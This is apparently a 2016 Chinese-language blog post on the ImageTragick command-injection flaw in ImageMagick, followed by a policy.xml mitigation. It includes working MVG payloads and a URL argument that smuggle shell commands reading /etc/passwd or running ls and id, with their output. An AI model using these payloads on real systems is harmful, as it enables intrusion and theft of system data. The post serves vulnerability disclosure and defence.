updated 2016-05-09
ImageMagick 有個漏洞,叫作 ImageTragick
ImageMagick 是作圖片處理的套件、工具、程式,可把圖片變大變小、或轉成其它格式 (png / jpg 等等)
(圖片引用 ImageTragick)
攻擊方式
vi imagetragick.mvg
viewbox 0 0 1 1 image over 0,0 0,0 'https://voidsec.com/" || cat /etc/passwd && echo "0'
產生圖檔
convert imagetragick.mvg output.png
結果就 show 出系統內容了
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin (省略) 0 convert: no decode delegate for this image format `/tmp/magick-k-R1Wh1d' @ error/constitute.c/ReadImage/566.
或
vi imagetragick2.mvg
push graphic-context viewbox 0 0 640 480 fill 'url(https://voidsec.com/logo.png"|cat "/etc/passwd)' pop graphic-context
identify imagetragick2.mvg
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin (省略) identify: unrecognized color `https://voidsec.com/logo.png"|cat "/etc/passwd' @ warning/color.c/GetColorCompliance/947. identify: no decode delegate for this image format `/tmp/magick-N_zPwgrX' @ error/constitute.c/ReadImage/566. imagetragick2.mvg MVG 640x480 640x480+0+0 16-bit DirectClass 121B 0.000u 0:00.109 identify: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3145.
以上是秀出 passwd,也可以 ls
convert 'https://example.com"|ls "-la' out.png
防護方式 (目前的 patch 還沒有完全解決,只能暫時這麼作)
vi /etc/ImageMagick/policy.xml
# 加入
<policymap> <policy domain="coder" rights="none" pattern="EPHEMERAL" /> <policy domain="coder" rights="none" pattern="URL" /> <policy domain="coder" rights="none" pattern="HTTPS" /> <policy domain="coder" rights="none" pattern="MVG" /> <policy domain="coder" rights="none" pattern="MSL" /> <policy domain="coder" rights="none" pattern="TEXT" /> <policy domain="coder" rights="none" pattern="SHOW" /> <policy domain="coder" rights="none" pattern="WIN" /> <policy domain="coder" rights="none" pattern="PLT" /> </policymap>
調整前的狀態
convert -list policy
Path: [built-in] Policy: Undefined rights: None
調整後
Path: [built-in] Policy: Undefined rights: None Path: /etc/ImageMagick/policy.xml Policy: Coder rights: None pattern: EPHEMERAL Policy: Coder rights: None pattern: URL Policy: Coder rights: None pattern: HTTPS Policy: Coder rights: None pattern: MVG Policy: Coder rights: None pattern: MSL Policy: Coder rights: None pattern: TEXT Policy: Coder rights: None pattern: SHOW Policy: Coder rights: None pattern: WIN Policy: Coder rights: None pattern: PLT
執行以上 convert 動作,也就不 work 了
convert: not authorized `imagetragick.mvg' @ error/constitute.c/ReadImage/453. convert: missing an image filename `output.png' @ error/convert.c/ConvertImageCommand/3015.
又或者可以用 /PoCs 測試
假如是使用 php imagick module,它也是使用 ImageMagick,所以也存在著漏洞的風險
不過,我尚測試不出以上的結果 (指令方式產出的)
<?php
header('Content-type: image/jpeg');
#$imagick = new Imagick('logo.jpg');
$imagick = new Imagick('imagetragick.mvg');
$imagick->thumbnailImage(200, 200);
$imagick->setImageFormat('png');
$imagick->writeImage('output.png');
echo $imagick;
?>
PS: 作了 policy 設定,一般的圖片產出還是能正常的
參考
http://www.1990day.com/2016/05/05/ImageMagick-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2016-3714/
https://github.com/ImageTragick/PoCs
https://imagetragick.com/
我試了另個寫法 (參考)
push graphic-context viewbox 0 0 640 480 fill 'url(https://"|id; ")' pop graphic-context
同樣的指令方式可以看到 id 訊息
但網頁還是得不到結果
不過 Apache 的 error_log 可以看到
sh: : command not found httpd: unrecognized color `https://"|id; "' @ warning/color.c/GetColorCompliance/947. httpd: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1057. httpd: no decode delegate for this image format `/tmp/magick-RkBqItD9' @ error/constitute.c/ReadImage/566.
留言